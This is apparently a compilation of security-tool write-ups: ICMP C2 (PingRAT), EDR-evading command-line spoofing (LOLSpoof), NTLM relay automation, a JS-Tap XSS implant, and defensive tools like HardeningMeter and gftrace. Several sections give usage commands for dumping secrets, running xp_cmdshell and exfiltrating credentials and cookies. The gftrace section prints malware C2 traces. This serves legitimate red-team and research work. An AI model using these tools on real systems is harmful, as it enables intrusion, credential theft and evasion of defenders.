bypassfuzzer.py -u https://example.com/forbidden -hl 638

TODO

  • [x] Automatically check other methods/verbs for bypass
  • [x] absolute domain attack
  • [ ] Add HTTP/2 support
  • [ ] Looking for ideas. Ping me on twitter! @intrudir


PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads


PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.
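
As a conceptual illustration of carrying data in ICMP payloads (a minimal scapy sketch, not PingRAT's actual protocol; the destination address is a placeholder and root privileges are required):

from scapy.all import IP, ICMP, Raw, sr1  # pip install scapy

# Send a small command string inside an ICMP echo request and print the
# payload of whatever echo reply comes back.
reply = sr1(IP(dst="192.0.2.10") / ICMP() / Raw(load=b"whoami"), timeout=2, verbose=0)
if reply is not None and reply.haslayer(Raw):
    print(reply[Raw].load)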

Features:

  • Uses ICMP for Command and Control
  • Undetectable by most AV/EDR solutions
  • Written in Go

Installation:

Download the binaries

or build the binaries and you are ready to go:

$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go

Usage:

Server:

./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)

Client:

./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)



LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line


LOLSpoof is an interactive shell program that automatically spoofs the command line arguments of the spawned process. Just call your incriminating-looking LOLBin command line (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.


Why

The process command line is heavily monitored telemetry, thoroughly inspected by AV/EDRs, SOC analysts and threat hunters.

How

  1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
  2. Spawns that suspended LOLBin with the spoofed command line
  3. Gets the remote PEB address
  4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
  5. Gets the address of the command line unicode buffer
  6. Overrides the fake command line with the real one
  7. Resumes the main thread

Opsec considerations

Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry:

  1. Creation of a suspended process
  2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead)
  3. Write to the spawned process with WriteProcessMemory

Build

Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

nimble install winim

Known issue

Programs that clear or change the previously printed console messages (such as timeout.exe 10) break the program. When such commands are employed, you'll need to restart the console. I don't know how to fix that; open to suggestions.



SQLMC - Check All Urls Of A Domain For SQL Injections


SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
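
As a minimal illustration of an error-based check (hypothetical error signatures; SQLMC's own crawling and detection logic is more involved):

import requests

# A handful of database error strings that commonly betray SQL injection.
ERROR_SIGNATURES = (
    "you have an error in your sql syntax",
    "unclosed quotation mark",
    "sqlite3.operationalerror",
)

def quick_sqli_check(url: str) -> bool:
    # Append a single quote to the URL and look for error strings in the body.
    body = requests.get(url + "'", timeout=10).text.lower()
    return any(sig in body for sig in ERROR_SIGNATURES)

print(quick_sqli_check("http://example.com/item?id=1"))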

Features

  • Scans a domain for SQL injection vulnerabilities
  • Crawls the given URL up to a specified depth
  • Checks each link for SQL injection vulnerabilities
  • Reports vulnerabilities along with server information and depth

Installation

  1. Install the required dependencies:

pip3 install sqlmc

Usage

Run sqlmc with the following command-line arguments:

  • -u, --url: The URL to scan (required)
  • -d, --depth: The depth to scan (required)
  • -o, --output: The output file to save the results

Example usage:

sqlmc -u http://example.com -d 2

Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

The tool will then perform the scan and display the results.

ToDo

  • Check for multiple GET params
  • Better injection checker trigger methods

Credits

License

This project is licensed under the GNU Affero General Public License v3.0.



BadExclusionsNWBO - An Evolution From BadExclusions To Identify Folder Custom Or Undocumented Exclusions On AV/EDR


BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.

How it works?

BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe in the same folder as BadExclusionsNWBO.exe.

Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or less, the folder has an exclusion; otherwise, the folder is not excluded.


Original idea?

Since the release of BadExclusions I've been thinking about how to achieve the same results without creating as much noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.

If you download Probatorum-EDR-Userland-Hook-Checker and run it inside a regular folder and in a folder with a specific type of exclusion, you will notice a huge difference. All the information is in the Probatorum repository.

Requirements

Each vendor applies exclusions in a different way. In order to get the list of folder exclusions, a specific type of exclusion should be made. Not all types of exclusions, and not all vendors, remove the hooks when they exclude a folder.

The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write Hook_Checker file and get the results.

EDR Demo

https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4



Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

Description

Presented at CODE BLUE 2023, this project titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis introduces IOCTLance, a tool that enhances its capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknown ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


Features

Target Vulnerability Types

  • map physical memory
  • controllable process handle
  • buffer overflow
  • null pointer dereference
  • read/write controllable address
  • arbitrary shellcode execution
  • arbitrary wrmsr
  • arbitrary out
  • dangerous file operation

Optional Customizations

  • length limit
  • loop bound
  • total timeout
  • IoControlCode timeout
  • recursion
  • symbolize data section

Build

Docker (Recommended)

docker build .

Local

dpkg --add-architecture i386
apt-get update
apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
libffi-dev libxslt1-dev libxml2-dev

pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

Analysis

# python3 analysis/ioctlance.py -h
usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
[-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
path

positional arguments:
path dir (including subdirectory) or file path to the driver(s) to analyze

optional arguments:
-h, --help show this help message and exit
-i IOCTLCODE, --ioctlcode IOCTLCODE
analyze specified IoControlCode (e.g. 22201c)
-T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
-t TIMEOUT, --timeout TIMEOUT
timeout for analyze each IoControlCode (default 40, 0 to unlimited)
-l LENGTH, --length LENGTH
the limit of number of instructions for technique LengthLimiter (default 0, 0
to unlimited)
-b BOUND, --bound BOUND
the bound for technique LoopSeer (default 0, 0 to unlimited)
-g GLOBAL_VAR, --global_var GLOBAL_VAR
symbolize how many bytes in .data section (default 0 hex)
-a ADDRESS, --address ADDRESS
address of ioctl handler to directly start hunting with blank state (e.g.
140005c20)
-e EXCLUDE, --exclude EXCLUDE
exclude function address split with , (e.g. 140005c20,140006c20)
-o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
-r, --recursion do not kill state if detecting recursion (default False)
-c, --complete get complete base state (default False)
-d, --debug print debug info while analyzing (default False)

Evaluation

# python3 evaluation/statistics.py -h
usage: statistics.py [-h] [-w] path

positional arguments:
path target dir or file path

optional arguments:
-h, --help show this help message and exit
-w, --wdm copy the wdm drivers into <path>/wdm

Test

  1. Compile the testing examples in test to generate testing driver files.
  2. Run IOCTLance against the driver files.

Reference



NTLM Relay Gat - Powerful Tool Designed To Automate The Exploitation Of NTLM Relays


NTLM Relay Gat is a powerful tool designed to automate the exploitation of NTLM relays using ntlmrelayx.py from the Impacket tool suite. By leveraging the capabilities of ntlmrelayx.py, NTLM Relay Gat streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.


Features

  • Multi-threading Support: Utilize multiple threads to perform actions concurrently.
  • SMB Shares Enumeration: List available SMB shares.
  • SMB Shell Execution: Execute a shell via SMB.
  • Secrets Dumping: Dump secrets from the target.
  • MSSQL Database Enumeration: List available MSSQL databases.
  • MSSQL Command Execution: Execute operating system commands via xp_cmdshell or start SQL Server Agent jobs.

Prerequisites

Before you begin, ensure you have met the following requirements:

  • proxychains properly configured with ntlmrelayx SOCKS relay port
  • Python 3.6+

Installation

To install NTLM Relay Gat, follow these steps:

  1. Ensure that Python 3.6 or higher is installed on your system.

  2. Clone NTLM Relay Gat repository:

git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat
  3. Install dependencies, if you don't have them installed already:
pip install -r requirements.txt

NTLM Relay Gat is now installed and ready to use.

Usage

To use NTLM Relay Gat, make sure you've got relayed sessions in ntlmrelayx.py's socks command output and that you have proxychains configured to use ntlmrelayx.py's proxy, and then execute the script with the desired options. Here are some examples of how to run NTLM Relay Gat:

# List available SMB shares using 10 threads
python ntlm_relay_gat.py --smb-shares -t 10

# Execute a shell via SMB
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell

# Dump secrets from the target
python ntlm_relay_gat.py --dump-secrets

# List available MSSQL databases
python ntlm_relay_gat.py --mssql-dbs

# Execute an operating system command via xp_cmdshell
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'

Disclaimer

NTLM Relay Gat is intended for educational and ethical penetration testing purposes only. Usage of NTLM Relay Gat for attacking targets without prior mutual consent is illegal. The developers of NTLM Relay Gat assume no liability and are not responsible for any misuse or damage caused by this tool.

License

This project is licensed under the MIT License - see the LICENSE file for details.



Gftrace - A Command Line Windows API Tracing Tool For Golang Binaries


A command line Windows API tracing tool for Golang binaries.

Note: This tool is a PoC and a work-in-progress prototype, so please treat it as such. Feedback is always welcome!


How it works?

Although Golang programs contain a lot of nuances regarding the way they are built and their behavior at runtime, they still need to interact with the OS layer, and that means at some point they need to call functions from the Windows API.

The Go runtime package contains a function called asmstdcall, and this function is a kind of "gateway" used to interact with the Windows API. Since this function is expected to call the Windows API functions, we can assume it needs to have access to information such as the address of the function and its parameters, and this is where things start to get more interesting.

Asmstdcall receives a single parameter which is a pointer to something similar to the following structure:

struct LIBCALL {
    DWORD_PTR Addr;
    DWORD Argc;
    DWORD_PTR Argv;
    DWORD_PTR ReturnValue;

    [...]
}

Some of these fields are filled after the API function is called, like the return value; others are received by asmstdcall, like the function address, the number of arguments and the list of arguments. Regardless of when those are set, it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.

gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log them to the user. The tool is capable of logging the function name, its parameters and also the return value of each Windows function called by a Golang application, all with no need to hook a single API function or have a signature for it.

The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).

If you want to know more about this project and research check the blogpost.

Installation

Download the latest release.

Usage

  1. Make sure gftrace.exe, gftrace.dll and gftrace.cfg are in the same directory.
  2. Specify which API functions you want to trace in the gftrace.cfg file (the tool does not work without API filters applied).
  3. Run gftrace.exe passing the target Golang program path as a parameter.
gftrace.exe <filepath> <params>

Configuration

All you need to do is specify which functions you want to trace in the gftrace.cfg file, separating them by commas with no spaces:

CreateFileW,ReadFile,CreateProcessW

The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined by analyzing the method itself or by trying to guess them. There are some interesting characteristics that can help: for example, Golang applications seem to always prefer to call functions from the "Wide" and "Ex" sets (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc.), so you can consider that during your analysis.

The default config file contains multiple functions which I have already tested (at least most of them) and can say for sure can be called by a Golang application at some point. I'll try to update it eventually.

Examples

Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:

- CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
- CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)

Tracing CreateProcessW() in the TunnelFish malware:

- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress |  ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)

[...]

Tracing multiple functions in the Sunshuttle malware:

- CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
- WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
- WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
- WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
- WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
- WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)

[...]

Tracing multiple functions in the DeimosC2 framework agent:

- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
- setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
- socket(0x2, 0x1, 0x6) = 0x138 (312)
- WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
- GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
- GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
- LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
- NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
- GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
- GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
- CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
- GetCurrentProcessId() = 0x2584 (9604)
- GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57)

[...]

Future features:

  • [x] Support inspection of 32 bits files.
  • [x] Add support to files calling functions via the "IAT jmp table" instead of the API call directly in asmstdcall.
  • [x] Add support to cmdline parameters for the target process
  • [ ] Send the tracing log output to a file by default to make it easier to filter. Currently there's no separation between the target file output and the gftrace output. An alternative is to redirect gftrace output to a file using the command line.

:warning: Warning

  • The tool inspects the target binary dynamically, which means the file being traced is executed. If you're inspecting malware or unknown software, please make sure you do it in a controlled environment.
  • Golang programs can be very noisy depending on the file and/or function being traced (e.g. VirtualAlloc is always called multiple times by the runtime package, CreateFileW is called multiple times before a call to CreateProcessW, etc). The tool ignores the Golang runtime initialization noise, but after that it's up to the user to decide what functions are better to filter in each scenario.

License

The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.



HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems


HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN and the NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. HardeningMeter supports all Linux distributions and machine-readable output; the results can be printed to the screen in a table format or exported to a csv. (For more information see the Documentation.md file)
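
As a simplified illustration of the kind of checks involved (a sketch built on the readelf command the tool requires, not HardeningMeter's own code):

import subprocess

def readelf(args, path):
    return subprocess.run(["readelf", *args, "--wide", path],
                          capture_output=True, text=True).stdout

# A stack canary usually shows up as a __stack_chk_fail symbol reference;
# full or partial RELRO shows up as a GNU_RELRO program header.
def has_canary(path):
    return "__stack_chk_fail" in readelf(["--syms"], path)

def has_relro(path):
    return "GNU_RELRO" in readelf(["--program-headers"], path)

print(has_canary("/bin/cp"), has_relro("/bin/cp"))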


Execute Scanning Example

Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, and the system, and export the results to a csv file:

python3 HardeningMeter.py -d /usr/bin -f /usr/sbin/newusers -s -c

Installation Requirements

Before installing HardeningMeter, make sure your machine has the following:
  1. readelf and file commands
  2. Python version 3
  3. pip
  4. tabulate

pip install tabulate

Install HardeningMeter

The very latest developments can be obtained via git.

Clone or download the project files (no compilation nor installation is required)

git clone https://github.com/OfriOuzan/HardeningMeter

Arguments

-f --file

Specify the files you want to scan; the argument can accept more than one file, separated by spaces.

-d --directory

Specify the directory you want to scan; the argument takes one directory and scans all ELF files in it recursively.

-e --external

Specify whether you want to add external checks (False by default).

-m --show_missing

Prints, in order, only those files that are missing security hardening mechanisms and need extra attention.

-s --system

Specify if you want to scan the system hardening methods.

-c --csv_format

Specify if you want to save the results to csv file (results are printed as a table to stdout by default).

Results

HardeningMeter's results are printed as a table and consist of 3 different states:
  • (X) - This state indicates that the binary hardening mechanism is disabled.
  • (V) - This state indicates that the binary hardening mechanism is enabled.
  • (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.

Notes

When the default language on Linux is not English, make sure to prefix the command with "LC_ALL=C", for example: LC_ALL=C python3 HardeningMeter.py -f /bin/cp -s



JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application


JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


Changelogs

Major changes are documented in the project Announcements:
https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

Demo

You can read the original blog post about JS-Tap here:
https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

Short demo from ShmooCon of JS-Tap version 1:
https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
https://youtu.be/aWvNLJnqObQ?t=11719

A demo can also be seen in this webinar:
https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

Upgrade warning

I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

Introduction

JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

The example JS-Tap payload is contained in the telemlib.js file in the payloads directory; however, any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using it in an engagement, strongly consider changing the naming of endpoints, stripping comments, and heavily obfuscating the payload.

Make sure you review the configuration section below carefully before using on a publicly exposed server.

Data Collected

  • Client IP address, OS, Browser
  • User inputs (credentials, etc.)
  • URLs visited
  • Cookies (that don't have httponly flag set)
  • Local Storage
  • Session Storage
  • HTML code of pages visited (if feature enabled)
  • Screenshots of pages visited
  • Copy of Form Submissions
  • Copy of XHR API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body
  • Copy of Fetch API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body

Note: the ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode, only Fetch API calls can currently be copied.

Operating Modes

The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function; search for the window.taperMode variable.

Trap Mode

Trap mode is typically the mode you would use as an XSS payload. Execution of XSS payloads is often fleeting: the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data.

Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. current location). The trap will set when the user visits the login page, and they'll hopefully continue into the authenticated portions of the application inside the iframe trap.

A user refreshing the page will generally break/escape the iframe trap.

Implant Mode

Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

Installation and Start

Requires python3. A large number of dependencies are required for the jsTapServer, so you are highly encouraged to use Python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

Example:

mkdir jsTapEnvironment
python3 -m venv jsTapEnvironment
source jsTapEnvironment/bin/activate
cd jsTapEnvironment
git clone https://github.com/hoodoer/JS-Tap
cd JS-Tap
pip3 install -r requirements.txt

run in debug/single thread mode:
python3 jsTapServer.py

run with gunicorn multithreaded (production use):
./jstapRun.sh

A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

Note that on Mac I also had to install libmagic outside of python.

brew install libmagic

Playing with JS-Tap locally is fine, but to use it in a proper engagement you'll need to be running JS-Tap on a publicly accessible VPS and set up JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

Configuration

JS-Tap Server Configuration

Debug/Single thread config

If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

Proxy Mode

For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.

When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.
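
As a minimal sketch of the proxy-mode idea (illustrative only, not JS-Tap's actual code), a Flask handler behind NGINX can derive the client IP like this:

from flask import Flask, request

app = Flask(__name__)
PROXYMODE = True  # stand-in for the proxyMode setting described above

@app.route("/")
def index():
    if PROXYMODE:
        # Behind NGINX, trust the X-Forwarded-For header set by the proxy.
        client_ip = request.headers.get("X-Forwarded-For", request.remote_addr)
    else:
        # Without a proxy, use the source IP of the connection.
        client_ip = request.remote_addr
    return "client ip: " + client_ip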

Data Directory

The dataDirectory parameter tells JS-Tap which directory to use for the SQLite database and the loot directory. Not all "loot" is stored in the database; screenshots and scraped HTML files in particular are not.

Server Port

To change the server port configuration see the last line of jsTapServer.py

app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

Gunicorn Production Configuration

Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGINX to also use multiple processes so you don't bottleneck on the proxy itself.

At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;
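
As a quick sketch of that sizing rule (these are the starting points suggested above, not hard requirements):

import multiprocessing

numWorkers = multiprocessing.cpu_count() + 1  # number of CPUs + 1
numThreads = 4                                # 4-8 depending on how beefy the processors are
print(numWorkers, numThreads)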

Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.

Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

telemlib.js Configuration

These configuration variables are in the initGlobals() function.

JS-Tap Server Location

You need to configure the payload with the URL of the JS-Tap server it will connect back to.

window.taperexfilServer = "https://127.0.0.1:8444";

Mode

Set to either trap or implant. This is set with the variable:

window.taperMode = "trap";
or
window.taperMode = "implant";

Trap Mode Starting Page

Only needed for trap mode. See explanation in Operating Modes section above.
Sets the page the user starts on when the iFrame trap is set.

window.taperstartingPage = "http://targetapp.com/somestartpage";

If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

window.taperstartingPage = window.location.href;

Client Tag

Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served; you can have multiple JS-Tap payloads configured with different modes, start pages, and client tags.

This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Set up multiple payloads, each with the appropriate configuration for the application it's being used against, and add a tag indicating which app the client is running.

